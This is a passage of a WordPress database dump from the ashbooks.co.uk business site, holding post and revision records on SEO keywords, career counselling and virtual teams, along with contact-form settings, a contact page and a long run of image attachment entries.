10:44:29','',0,'https://ashbooks.co.uk/?p=45',0,'post','',0),(46,1,'2018-02-06 09:56:26','2018-02-06 09:56:26','Keeping away from the usual known SEO Pitfalls : Choosing the niche keywords to optimize for a website is one of the most crucial aspects of SEO strategic planning and implementation. This stage acts as the footstone and if done well can lay a concrete foundation for building the rest of the optimization techniques that are to be implemented in the future. Even the most experienced optimization experts may sometime overlook the importance of this and target the highly competitive keywords hence causing a newly built site to face crucial set-backs in the SERP\'s. An ideal choice of keywords for optimization a website requires a perfect combination of research and modesty.\r\nb. Listing Down Specific Keywords During Start-up : If you have a website that sells products, services, in that case it becomes crucial to ensure that the choice of keywords are highly related to the niche. On the contrary, choosing general/non-specific keywords would usually result in greater competition that might weaken your chances of getting ranked well in the search results. If computer parts and peripherals form the niche of your site, then optimizing the website for LCD Monitor screens, keyboards, ram, i5/i7/intel processor, and the most detailed components that you are offering must be chosen to work upon. Do you also offer AMD processors ? Are there any colours that an end user may choose from? What are the brands offered? , the more the detailed keywords you choose, you get a better chance be to ranked well for those keywords in SERP\'s. It is even observed that when a user finds your webpage for a particular search phrase, the probability of convertion is higher as compared to non-specific keywords.\r\n\r\nc. You may choose to row your foot into a reagionalised market instead of going straight for the targeted one\'s, this can make you face a much reduced competition and may yield better results to begin with. If you are a provider who operates only in the UK, you must ensure that most of the specific phrases are included (such as : United Kingdom, England, London, etc.) within title tags, body , and the anchor text of the webpage. When building a new site, despite your intentions of expanding your business globally, it is usually better to focus on the regional market first, once its set firm in there, you may think of expansion. Once these keywords perform well and you have the logistic capabilities to grow your business to target different overseas markets, then you can start to optimise your site to reflect your general business strategies.','Designing a Region Based Business Strategy','','inherit','closed','closed','','45-revision-v1','','','2018-02-06 09:56:26','2018-02-06 09:56:26','',45,'https://ashbooks.co.uk/45-revision-v1',0,'revision','',0),(47,1,'2018-02-06 09:57:32','2018-02-06 09:57:32','Career counseling is a method in which one can assess interest of people; values and talents that they have that can help them to identify career options available to them. It is one of the important step which help people to make important decisions about their career can also help them in getting the right job which will eventually help their career. A lot of people end up doing jobs which they don’t even find interesting or something which is not suitable to them. There are a lot of reasons responsible for such situations and one of the most common reasons is that people don’t get correct guidance and knowledge about their career. Everyone has different talent but not everyone is aware of various career options available to them these days. A lot of people don’t even have an idea of where their strength and weakness lies and what kind of job will suit them. However, if you are staying in Minneapolis, you can take help of career counselors in Minneapolis, who are very well trained and counselors hold a deep and extensive understanding of the job market. They can very well guide a person as to what kind of job will suit them and what all qualities they will need in order to perform well at work.\r\nOne can easily find career counseling in Minneapolis and the services of a counselor will help a person to get perfect job. Ones you will choose the right service, counselors will start their counseling process which is generally done either one-on-one or in group in order to identify and analyze an individual\'s skills, access a person\'s interest and check various other skills like aptitude, understanding towards the job and their personal and professional goals. Choosing the right service of career counseling in Minneapolis will also help you to feel at ease and you won’t feel stress and panic because of job and fulfilling their job requirements. You won’t receive only career counseling from the counselors but instead they also help to increase the confidence level of a person and also enhance their standard of work that eventually will help you to achieve your goals and make you work under various work conditions. In cases where you face any trouble finding the right career counseling service for you, you can also choose to look for services online. There are a lot of options to choose from when it comes to online career counseling. You can choose to pick the career that you think suit your capabilities and interest at its best.\r\nWhen it comes to choosing a counselor, it is advised to choose a professional rather than asking people who don’t even hold complete knowledge about the subject. Seeking help from a professional counselor will give you a better knowledge about your pit falls and your strengths and how you can utilize them in the best possible way in your career growth. Also before selecting career counseling service, make sure you check the experience of the counselor in order to be sure that the money you will spend will not be wasted.','Reasons you should opt for career counseling','','publish','open','open','','reasons-you-should-opt-for-career-counseling','','','2018-02-06 10:44:25','2018-02-06 10:44:25','',0,'https://ashbooks.co.uk/?p=47',0,'post','',0),(48,1,'2018-02-06 09:57:32','2018-02-06 09:57:32','Career counseling is a method in which one can assess interest of people; values and talents that they have that can help them to identify career options available to them. It is one of the important step which help people to make important decisions about their career can also help them in getting the right job which will eventually help their career. A lot of people end up doing jobs which they don’t even find interesting or something which is not suitable to them. There are a lot of reasons responsible for such situations and one of the most common reasons is that people don’t get correct guidance and knowledge about their career. Everyone has different talent but not everyone is aware of various career options available to them these days. A lot of people don’t even have an idea of where their strength and weakness lies and what kind of job will suit them. However, if you are staying in Minneapolis, you can take help of career counselors in Minneapolis, who are very well trained and counselors hold a deep and extensive understanding of the job market. They can very well guide a person as to what kind of job will suit them and what all qualities they will need in order to perform well at work.\r\nOne can easily find career counseling in Minneapolis and the services of a counselor will help a person to get perfect job. Ones you will choose the right service, counselors will start their counseling process which is generally done either one-on-one or in group in order to identify and analyze an individual\'s skills, access a person\'s interest and check various other skills like aptitude, understanding towards the job and their personal and professional goals. Choosing the right service of career counseling in Minneapolis will also help you to feel at ease and you won’t feel stress and panic because of job and fulfilling their job requirements. You won’t receive only career counseling from the counselors but instead they also help to increase the confidence level of a person and also enhance their standard of work that eventually will help you to achieve your goals and make you work under various work conditions. In cases where you face any trouble finding the right career counseling service for you, you can also choose to look for services online. There are a lot of options to choose from when it comes to online career counseling. You can choose to pick the career that you think suit your capabilities and interest at its best.\r\nWhen it comes to choosing a counselor, it is advised to choose a professional rather than asking people who don’t even hold complete knowledge about the subject. Seeking help from a professional counselor will give you a better knowledge about your pit falls and your strengths and how you can utilize them in the best possible way in your career growth. Also before selecting career counseling service, make sure you check the experience of the counselor in order to be sure that the money you will spend will not be wasted.','Reasons you should opt for career counseling','','inherit','closed','closed','','47-revision-v1','','','2018-02-06 09:57:32','2018-02-06 09:57:32','',47,'https://ashbooks.co.uk/47-revision-v1',0,'revision','',0),(49,1,'2018-02-06 09:57:56','2018-02-06 09:57:56','In this 60 minute webinar, Tamara shares actual work experience of being a successful remote employee and remote manager in less than ideal circumstances and learning through experimentation and error the most effective development for both employees and managers.\r\n\r\nWhy you should attend: Managers need to remain relevant by upgrading their skills to incorporate the process and technology necessary for creating effective virtual teams.\r\n\r\nManaging a virtual team is fast becoming more the rule than the exception in organizations. These teams may be distributed across town, across the globe, the team may travel or they may work in a common office space but communicate via e-mail to their co-workers across the hall. The workplace is changing and as effective managers, we must also change and recognize that \"work is something that we do and not a place that we go.\"\r\n\r\nAreas Covered in the Session: Identify the Organizational Culture and Leadership required for High Performing Virtual Teams\r\n\r\nNecessary Skills for Successful Virtual Team Leadership\r\n\r\nCharacteristics of a High Performing Virtual Team\r\n\r\nSelecting the Best Technology for the Team by Blending Asynchronous and Synchronous Tools\r\n\r\nCoaching and Motivating your Virtual Team to Optimum Performance\r\n\r\nLessons learned from Organizations that have Effective Virtual Teams\r\n\r\nWho Will Benefit: All levels of managers from the newly appointed to the executive level\r\n\r\nHuman Resources\r\n\r\nTelework Administrators','Virtual Teams: How to Sustain High Performing Teams in the Virtual Workplace','','publish','open','open','','virtual-teams-how-to-sustain-high-performing-teams-in-the-virtual-workplace','','','2018-02-06 10:44:21','2018-02-06 10:44:21','',0,'https://ashbooks.co.uk/?p=49',0,'post','',0),(50,1,'2018-02-06 09:57:56','2018-02-06 09:57:56','In this 60 minute webinar, Tamara shares actual work experience of being a successful remote employee and remote manager in less than ideal circumstances and learning through experimentation and error the most effective development for both employees and managers.\r\n\r\nWhy you should attend: Managers need to remain relevant by upgrading their skills to incorporate the process and technology necessary for creating effective virtual teams.\r\n\r\nManaging a virtual team is fast becoming more the rule than the exception in organizations. These teams may be distributed across town, across the globe, the team may travel or they may work in a common office space but communicate via e-mail to their co-workers across the hall. The workplace is changing and as effective managers, we must also change and recognize that \"work is something that we do and not a place that we go.\"\r\n\r\nAreas Covered in the Session: Identify the Organizational Culture and Leadership required for High Performing Virtual Teams\r\n\r\nNecessary Skills for Successful Virtual Team Leadership\r\n\r\nCharacteristics of a High Performing Virtual Team\r\n\r\nSelecting the Best Technology for the Team by Blending Asynchronous and Synchronous Tools\r\n\r\nCoaching and Motivating your Virtual Team to Optimum Performance\r\n\r\nLessons learned from Organizations that have Effective Virtual Teams\r\n\r\nWho Will Benefit: All levels of managers from the newly appointed to the executive level\r\n\r\nHuman Resources\r\n\r\nTelework Administrators','Virtual Teams: How to Sustain High Performing Teams in the Virtual Workplace','','inherit','closed','closed','','49-revision-v1','','','2018-02-06 09:57:56','2018-02-06 09:57:56','',49,'https://ashbooks.co.uk/49-revision-v1',0,'revision','',0),(52,1,'2018-02-06 09:59:37','2018-02-06 09:59:37','','Business Books','','publish','closed','closed','','business-books','','','2018-02-06 09:59:37','2018-02-06 09:59:37','',0,'https://ashbooks.co.uk/?page_id=52',0,'page','',0),(53,1,'2018-02-06 09:59:37','2018-02-06 09:59:37','','Business Books','','inherit','closed','closed','','52-revision-v1','','','2018-02-06 09:59:37','2018-02-06 09:59:37','',52,'https://ashbooks.co.uk/52-revision-v1',0,'revision','',0),(54,1,'2018-02-06 10:02:05','2018-02-06 10:02:05','','Weblog','','publish','closed','closed','','weblog','','','2018-02-06 10:02:05','2018-02-06 10:02:05','',0,'https://ashbooks.co.uk/?page_id=54',0,'page','',0),(55,1,'2018-02-06 10:02:05','2018-02-06 10:02:05','','Weblog','','inherit','closed','closed','','54-revision-v1','','','2018-02-06 10:02:05','2018-02-06 10:02:05','',54,'https://ashbooks.co.uk/54-revision-v1',0,'revision','',0),(56,1,'2018-02-06 10:03:18','2018-02-06 10:03:18','','Forum','','publish','closed','closed','','forum','','','2018-02-06 10:03:18','2018-02-06 10:03:18','',0,'https://ashbooks.co.uk/?page_id=56',0,'page','',0),(57,1,'2018-02-06 10:03:18','2018-02-06 10:03:18','','Forum','','inherit','closed','closed','','56-revision-v1','','','2018-02-06 10:03:18','2018-02-06 10:03:18','',56,'https://ashbooks.co.uk/56-revision-v1',0,'revision','',0),(58,1,'2018-02-06 10:05:00','2018-02-06 10:05:00','<label> Your Name (required)\r\n    [text* your-name] </label>\r\n\r\n<label> Your Email (required)\r\n    [email* your-email] </label>\r\n\r\n<label> Subject\r\n    [text your-subject] </label>\r\n\r\n<label> Your Message\r\n    [textarea your-message] </label>\r\n\r\n[submit \"Send\"]\n1\nashbooks \"[your-subject]\"\n[your-name] <wordpress@ashbooks.co.uk>\nleads@vanillacircus.co.uk\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on ashbooks (https://ashbooks.co.uk)\nReply-To: [your-email]\n\n\n\n\nashbooks \"[your-subject]\"\nashbooks <wordpress@ashbooks.co.uk>\n[your-email]\nMessage Body:\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on ashbooks (https://ashbooks.co.uk)\nReply-To: amber.platts@vanillacircus.co.uk\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nYour entered code is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2018-02-06 10:05:13','2018-02-06 10:05:13','',0,'https://ashbooks.co.uk/?post_type=wpcf7_contact_form&#038;p=58',0,'wpcf7_contact_form','',0),(59,1,'2018-02-06 10:08:26','2018-02-06 10:08:26','Leave your name, email address and some information about how Ash Books Business can help.\r\n\r\nWe will get back to you within 48 hours.\r\n\r\nTel: <a href=\"tel:020013311225\">020 0133 11225</a>\r\n\r\nEmail: <a href=\"mailto:business@ashbooks.co.uk\">business@ashbooks.co.uk</a>\r\n\r\nAddress: <a href=\"https://www.google.co.uk/maps/place/Billing+Rd,+Northampton+NN1/@52.2387011,-0.8768874,17z/data=!3m1!4b1!4m5!3m4!1s0x48770ed2d4fb13d3:0x9edf7f2b8483bfaf!8m2!3d52.2387011!4d-0.8746987?dcr=0\" target=\"_blank\" rel=\"noopener\">Billing Road, Northampton, NN1</a>\r\n\r\n[contact-form-7 id=\"58\" title=\"Contact form 1\"]','Contact Ash Books Business','','publish','closed','closed','','contact-ash-books-business','','','2018-02-06 10:08:42','2018-02-06 10:08:42','',0,'https://ashbooks.co.uk/?page_id=59',0,'page','',0),(60,1,'2018-02-06 10:08:26','2018-02-06 10:08:26','Leave your name, email address and some information about how Ash Books Business can help.\r\n\r\nWe will get back to you within 48 hours.\r\n\r\nTel: <a href=\"tel:020013311225\">020 0133 11225</a>\r\n\r\nEmail: <a href=\"mailto:business@ashbooks.co.uk\">business@ashbooks.co.uk</a>\r\n\r\nAddress: <a href=\"https://www.google.co.uk/maps/place/Billing+Rd,+Northampton+NN1/@52.2387011,-0.8768874,17z/data=!3m1!4b1!4m5!3m4!1s0x48770ed2d4fb13d3:0x9edf7f2b8483bfaf!8m2!3d52.2387011!4d-0.8746987?dcr=0\" target=\"_blank\" rel=\"noopener\">Billing Road, Northampton, NN1</a>\r\n\r\n[contact-form-7 id=\"58\" title=\"Contact form 1\"]','Contact Ash Books Business','','inherit','closed','closed','','59-revision-v1','','','2018-02-06 10:08:26','2018-02-06 10:08:26','',59,'https://ashbooks.co.uk/59-revision-v1',0,'revision','',0),(62,1,'2018-02-06 10:10:28','2018-02-06 10:10:28','','1people-woman-coffee-meeting','','inherit','open','closed','','1people-woman-coffee-meeting','','','2018-02-06 10:10:28','2018-02-06 10:10:28','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/1people-woman-coffee-meeting.jpg',0,'attachment','image/jpeg',0),(63,1,'2018-02-06 10:10:28','2018-02-06 10:10:28','','23055261039_164d7d63bc','','inherit','open','closed','','23055261039_164d7d63bc','','','2018-02-06 10:10:28','2018-02-06 10:10:28','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/23055261039_164d7d63bc.jpg',0,'attachment','image/jpeg',0),(64,1,'2018-02-06 10:10:30','2018-02-06 10:10:30','','advertising','','inherit','open','closed','','advertising','','','2018-02-06 10:10:30','2018-02-06 10:10:30','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/advertising.jpg',0,'attachment','image/jpeg',0),(65,1,'2018-02-06 10:10:30','2018-02-06 10:10:30','','bristol','','inherit','open','closed','','bristol','','','2018-02-06 10:10:30','2018-02-06 10:10:30','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/bristol.jpe',0,'attachment','image/jpeg',0),(66,1,'2018-02-06 10:10:31','2018-02-06 10:10:31','','business-257871_960_720','','inherit','open','closed','','business-257871_960_720','','','2018-02-06 10:10:31','2018-02-06 10:10:31','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/business-257871_960_720.jpg',0,'attachment','image/jpeg',0),(67,1,'2018-02-06 10:10:31','2018-02-06 10:10:31','','business-561387_960_720','','inherit','open','closed','','business-561387_960_720','','','2018-02-06 10:10:31','2018-02-06 10:10:31','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/business-561387_960_720.jpg',0,'attachment','image/jpeg',0),(68,1,'2018-02-06 10:10:32','2018-02-06 10:10:32','','download','','inherit','open','closed','','download','','','2018-02-06 10:10:32','2018-02-06 10:10:32','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/download.jpeg',0,'attachment','image/jpeg',0),(69,1,'2018-02-06 10:10:33','2018-02-06 10:10:33','','houses-2532766_960_720','','inherit','open','closed','','houses-2532766_960_720','','','2018-02-06 10:10:33','2018-02-06 10:10:33','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/houses-2532766_960_720.jpg',0,'attachment','image/jpeg',0),(70,1,'2018-02-06 10:10:34','2018-02-06 10:10:34','','images (1)','','inherit','open','closed','','images-1','','','2018-02-06 10:10:34','2018-02-06 10:10:34','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/images-1.jpeg',0,'attachment','image/jpeg',0),(71,1,'2018-02-06 10:10:34','2018-02-06 10:10:34','','images','','inherit','open','closed','','images','','','2018-02-06 10:10:34','2018-02-06 10:10:34','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/images.jpeg',0,'attachment','image/jpeg',0),(72,1,'2018-02-06 10:10:35','2018-02-06 10:10:35','','iphone-8','','inherit','open','closed','','iphone-8','','','2018-02-06 10:10:35','2018-02-06 10:10:35','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/iphone-8.jpg',0,'attachment','image/jpeg',0),(73,1,'2018-02-06 10:10:36','2018-02-06 10:10:36','','negocio-exito1','','inherit','open','closed','','negocio-exito1','','','2018-02-06 10:10:36','2018-02-06 10:10:36','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/negocio-exito1.jpg',0,'attachment','image/jpeg',0),(74,1,'2018-02-06 10:10:37','2018-02-06 10:10:37','','networking','','inherit','open','closed','','networking','','','2018-02-06 10:10:37','2018-02-06 10:10:37','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/networking.jpg',0,'attachment','image/jpeg',0),(75,1,'2018-02-06 10:10:38','2018-02-06 10:10:38','','promotional-products','','inherit','open','closed','','promotional-products','','','2018-02-06 10:10:38','2018-02-06 10:10:38','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/promotional-products.jpg',0,'attachment','image/jpeg',0),(76,1,'2018-02-06 10:10:39','2018-02-06 10:10:39','','startup-1018514_960_720','','inherit','open','closed','','startup-1018514_960_720','','','2018-02-06 10:10:39','2018-02-06 10:10:39','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/startup-1018514_960_720.png',0,'attachment','image/png',0),(77,1,'2018-02-06 10:10:39','2018-02-06 10:10:39','','startup-1994589_960_720','','inherit','open','closed','','startup-1994589_960_720','','','2018-02-06 10:10:39','2018-02-06 10:10:39','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/startup-1994589_960_720.png',0,'attachment','image/png',0),(78,1,'2018-02-06 10:11:30','2018-02-06 10:11:30','','1-1241448648KyD1','','inherit','open','closed','','1-1241448648kyd1','','','2018-02-06 10:11:30','2018-02-06 10:11:30','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/1-1241448648KyD1.jpg',0,'attachment','image/jpeg',0),(79,1,'2018-02-06 10:11:31','2018-02-06 10:11:31','','1bank','','inherit','open','closed','','1bank','','','2018-02-06 10:11:31','2018-02-06 10:11:31','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/1bank.jpg',0,'attachment','image/jpeg',0),(80,1,'2018-02-06 10:11:32','2018-02-06 10:11:32','','1life','','inherit','open','closed','','1life','','','2018-02-06 10:11:32','2018-02-06 10:11:32','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/1life.jpg',0,'attachment','image/jpeg',0),(81,1,'2018-02-06 10:11:32','2018-02-06 10:11:32','','1loan','','inherit','open','closed','','1loan','','','2018-02-06 10:11:32','2018-02-06 10:11:32','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/1loan.jpg',0,'attachment','image/jpeg',0),(82,1,'2018-02-06 10:11:33','2018-02-06 10:11:33','','1pension','','inherit','open','closed','','1pension','','','2018-02-06 10:11:33','2018-02-06 10:11:33','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/1pension.jpg',0,'attachment','image/jpeg',0),(83,1,'2018-02-06 10:11:34','2018-02-06 10:11:34','','5474209451_0cec39d92f_b','','inherit','open','closed','','5474209451_0cec39d92f_b','','','2018-02-06 10:11:34','2018-02-06 10:11:34','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/5474209451_0cec39d92f_b.jpg',0,'attachment','image/jpeg',0),(84,1,'2018-02-06 10:11:35','2018-02-06 10:11:35','','5475013342_2e72c20348_b','','inherit','open','closed','','5475013342_2e72c20348_b','','','2018-02-06 10:11:35','2018-02-06 10:11:35','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/5475013342_2e72c20348_b.jpg',0,'attachment','image/jpeg',0),(85,1,'2018-02-06 10:11:36','2018-02-06 10:11:36','','5930024542_bc00b01356_b','','inherit','open','closed','','5930024542_bc00b01356_b','','','2018-02-06 10:11:36','2018-02-06 10:11:36','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/5930024542_bc00b01356_b.jpg',0,'attachment','image/jpeg',0),(86,1,'2018-02-06 10:11:37','2018-02-06 10:11:37','','currency-2317703_960_720','','inherit','open','closed','','currency-2317703_960_720','','','2018-02-06 10:11:37','2018-02-06 10:11:37','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/currency-2317703_960_720.jpg',0,'attachment','image/jpeg',0),(87,1,'2018-02-06 10:11:37','2018-02-06 10:11:37','','Selling your business - All you need to know','','inherit','open','closed','','debt','','','2020-03-02 15:55:01','2020-03-02 15:55:01','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/debt.jpg',0,'attachment','image/jpeg',0),(88,1,'2018-02-06 10:11:38','2018-02-06 10:11:38','','law_hero_2-1950x1301','','inherit','open','closed','','law_hero_2-1950x1301','','','2018-02-06 10:11:38','2018-02-06 10:11:38','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/law_hero_2-1950x1301.jpg',0,'attachment','image/jpeg',0),(89,1,'2018-02-06 10:11:39','2018-02-06 10:11:39','','money house','','inherit','open','closed','','money-house','','','2018-02-06 10:11:39','2018-02-06 10:11:39','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/money-house.jpg',0,'attachment','image/jpeg',0),(90,1,'2018-02-06 10:11:41','2018-02-06 10:11:41','','moneymatters','','inherit','open','closed','','moneymatters','','','2018-02-06 10:11:41','2018-02-06 10:11:41','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/moneymatters.jpg',0,'attachment','image/jpeg',0),(91,1,'2018-02-06 10:11:41','2018-02-06 10:11:41','','pennies','','inherit','open','closed','','pennies','','','2018-02-06 10:11:41','2018-02-06 10:11:41','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/pennies.jpg',0,'attachment','image/jpeg',0),(92,1,'2018-02-06 10:11:42','2018-02-06 10:11:42','','pound-coins','','inherit','open','closed','','pound-coins','','','2018-02-06 10:11:42','2018-02-06 10:11:42','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/pound-coins.jpg',0,'attachment','image/jpeg',0),(93,1,'2018-02-06 10:11:42','2018-02-06 10:11:42','','pound-people','','inherit','open','closed','','pound-people','','','2018-02-06 10:11:42','2018-02-06 10:11:42','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/pound-people.jpg',0,'attachment','image/jpeg',0),(94,1,'2018-02-06 10:12:01','2018-02-06 10:12:01','','alex','','inherit','open','closed','','alex','','','2018-02-06 10:12:01','2018-02-06 10:12:01','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/alex.jpg',0,'attachment','image/jpeg',0),(95,1,'2018-02-06 10:12:02','2018-02-06 10:12:02','','boats','','inherit','open','closed','','boats','','','2018-02-06 10:12:02','2018-02-06 10:12:02','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/boats.jpg',0,'attachment','image/jpeg',0),(96,1,'2018-02-06 10:12:03','2018-02-06 10:12:03','','bus1','','inherit','open','closed','','bus1','','','2018-02-06 10:12:03','2018-02-06 10:12:03','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/bus1.jpg',0,'attachment','image/jpeg',0),(97,1,'2018-02-06 10:12:04','2018-02-06 10:12:04','','cavern-club','','inherit','open','closed','','cavern-club','','','2018-02-06 10:12:04','2018-02-06 10:12:04','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/cavern-club.jpg',0,'attachment','image/jpeg',0),(98,1,'2018-02-06 10:12:06','2018-02-06 10:12:06','','cavern-club3','','inherit','open','closed','','cavern-club3','','','2018-02-06 10:12:06','2018-02-06 10:12:06','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/cavern-club3.jpg',0,'attachment','image/jpeg',0),(99,1,'2018-02-06 10:12:08','2018-02-06 10:12:08','','coffee-break-1177540_960_720','','inherit','open','closed','','coffee-break-1177540_960_720','','','2018-02-06 10:12:08','2018-02-06 10:12:08','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/coffee-break-1177540_960_720.jpg',0,'attachment','image/jpeg',0),(100,1,'2018-02-06 10:12:09','2018-02-06 10:12:09','','concert','','inherit','open','closed','','concert','','','2018-02-06 10:12:09','2018-02-06 10:12:09','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/concert.jpg',0,'attachment','image/jpeg',0),(101,1,'2018-02-06 10:12:10','2018-02-06 10:12:10','','concert2','','inherit','open','closed','','concert2','','','2018-02-06 10:12:10','2018-02-06 10:12:10','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/concert2.jpg',0,'attachment','image/jpeg',0),(102,1,'2018-02-06 10:12:13','2018-02-06 10:12:13','','glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859.jpg!d','','inherit','open','closed','','glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859-jpgd','','','2018-02-06 10:12:13','2018-02-06 10:12:13','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859.jpgd_.jpe',0,'attachment','image/jpeg',0),(103,1,'2018-02-06 10:12:15','2018-02-06 10:12:15','','glass2','','inherit','open','closed','','glass2','','','2018-02-06 10:12:15','2018-02-06 10:12:15','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/glass2.jpe',0,'attachment','image/jpeg',0),(104,1,'2018-02-06 10:12:20','2018-02-06 10:12:20','','glass3','','inherit','open','closed','','glass3','','','2018-02-06 10:12:20','2018-02-06 10:12:20','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/glass3.jpe',0,'attachment','image/jpeg',0),(105,1,'2018-02-06 10:12:23','2018-02-06 10:12:23','','glass4','','inherit','open','closed','','glass4','','','2018-02-06 10:12:23','2018-02-06 10:12:23','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/glass4.jpe',0,'attachment','image/jpeg',0),(106,1,'2018-02-06 10:12:23','2018-02-06 10:12:23','','glass11','','inherit','open','closed','','glass11','','','2018-02-06 10:12:23','2018-02-06 10:12:23','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/glass11.jpe',0,'attachment','image/jpeg',0),(107,1,'2018-02-06 10:12:24','2018-02-06 10:12:24','','hall-828549_960_720','','inherit','open','closed','','hall-828549_960_720','','','2018-02-06 10:12:24','2018-02-06 10:12:24','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/hall-828549_960_720.jpg',0,'attachment','image/jpeg',0),(108,1,'2018-02-06 10:12:25','2018-02-06 10:12:25','','international-conference-1597529_960_720','','inherit','open','closed','','international-conference-1597529_960_720','','','2018-02-06 10:12:25','2018-02-06 10:12:25','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/international-conference-1597529_960_720.jpg',0,'attachment','image/jpeg',0),(109,1,'2018-02-06 10:12:27','2018-02-06 10:12:27','','Jetski-960x400_c','','inherit','open','closed','','jetski-960x400_c','','','2018-02-06 10:12:27','2018-02-06 10:12:27','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/Jetski-960x400_c.jpg',0,'attachment','image/jpeg',0),(110,1,'2018-02-06 10:12:28','2018-02-06 10:12:28','','light-828547_960_720','','inherit','open','closed','','light-828547_960_720','','','2018-02-06 10:12:28','2018-02-06 10:12:28','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/light-828547_960_720.jpg',0,'attachment','image/jpeg',0),(111,1,'2018-02-06 10:12:28','2018-02-06 10:12:28','','Selling your business - All you need to know','','inherit','open','closed','','men-1979261_960_720','','','2020-03-02 15:55:14','2020-03-02 15:55:14','',156,'https://ashbooks.co.uk/wp-content/uploads/2018/02/men-1979261_960_720.jpg',0,'attachment','image/jpeg',0),(112,1,'2018-02-06 10:12:29','2018-02-06 10:12:29','','office-1516329_960_720','','inherit','open','closed','','office-1516329_960_720','','','2018-02-06 10:12:29','2018-02-06 10:12:29','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/office-1516329_960_720.jpg',0,'attachment','image/jpeg',0),(113,1,'2018-02-06 10:12:30','2018-02-06 10:12:30','','Office-Christmas-Party','','inherit','open','closed','','office-christmas-party','','','2018-02-06 10:12:30','2018-02-06 10:12:30','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/Office-Christmas-Party.jpg',0,'attachment','image/jpeg',0),(114,1,'2018-02-06 10:12:30','2018-02-06 10:12:30','','records','','inherit','open','closed','','records','','','2018-02-06 10:12:30','2018-02-06 10:12:30','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/records.jpg',0,'attachment','image/jpeg',0),(115,1,'2018-02-06 10:12:31','2018-02-06 10:12:31','','workplace-1245776_960_720','','inherit','open','closed','','workplace-1245776_960_720','','','2018-02-06 10:12:31','2018-02-06 10:12:31','',0,'https://ashbooks.co.uk/wp-content/uploads/2018/02/workplace-1245776_960_720.jpg',0,'attachment','image/jpeg',0),(117,1,'2018-02-06 10:14:47','2018-02-06 10:14:47','Every little one is on facebook! Everything that will this suggest for yourself and what\'s the key reason why factors marketing on facebook appropriate right now?\r\n\r\nArticle : Every little one is on facebook! Everything that will this suggest for yourself and what\'s the key reason why factors marketing on facebook appropriate right now? The result is easy my best mate simply look at the first number of Google after the clicks have been details reasonable and riches were becoming created all from men and women getting benefit of the visitors from Google, well and even facebook marketing it is having it a great entire new stage! You will find a innovative advertising system that is quickly getting the following greatest direction for online marketing the home structured enterprise or marketing and advertising some thing for example in addition is certainly facebook pay-per-click, since you may learn Google was in the past the foremost required marketing system for ppc ads however in earlier times a few weeks Google may be closing down home biz entrepreneurs company accounts, slapping business 